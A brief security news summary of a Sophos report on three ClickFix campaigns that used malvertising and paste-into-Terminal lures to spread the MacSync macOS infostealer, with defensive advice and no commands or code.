A technical analysis by Sophos found that three ClickFix campaigns used paste‑into‑Terminal social engineering to deploy a macOS infostealer called MacSync from November 2025 through February 2026.
KEY FACTS
- Incident Three ClickFix campaigns delivered MacSync to macOS hosts.
- Malware MacSync is an AppleScript infostealer that exfiltrates credentials, files, keychain data and wallet seed phrases.
- Delivery Victims were lured to paste and run obfuscated Terminal commands that fetched a shell script and launched the stealer.
- Timeline Activity ran from November 2025 to February 2026 and targeted multiple regions.
In the November 2025 activity attackers used sponsored search results with OpenAI Atlas bait to direct users to a fake download page that instructed them to paste a Terminal command.
In December the campaigns used malvertising to link users to shared ChatGPT conversations and then to GitHub‑themed landing pages that prompted the same Terminal action. A February 2026 wave distributed a new MacSync variant that supports dynamic AppleScript and in‑memory execution to evade static analysis and behavioral detections.
The pasted command downloaded a shell script that contacted a hard coded server to retrieve an AppleScript payload. The script can prompt for the system password, run MacSync with user permissions and take steps to remove traces while exfiltrating credentials, keychain databases, files and wallet seed phrases.
Multiple threat actors have adopted ClickFix style lures to deliver a range of stealers and trojans on both macOS and Windows. It is not known whether the three campaigns were run by the same operator.
Site administrators are advised to keep software and plugins up to date, use strong admin passwords and two factor authentication, and scan for suspicious accounts. Users should avoid pasting unknown commands into Terminal and use reputable security software.
WHY IT MATTERS
The technique exploits a common developer installation pattern to trick users into running malicious commands and targets macOS because it often holds high value credentials and wallet data. Successful infections can lead to credential theft and financial loss.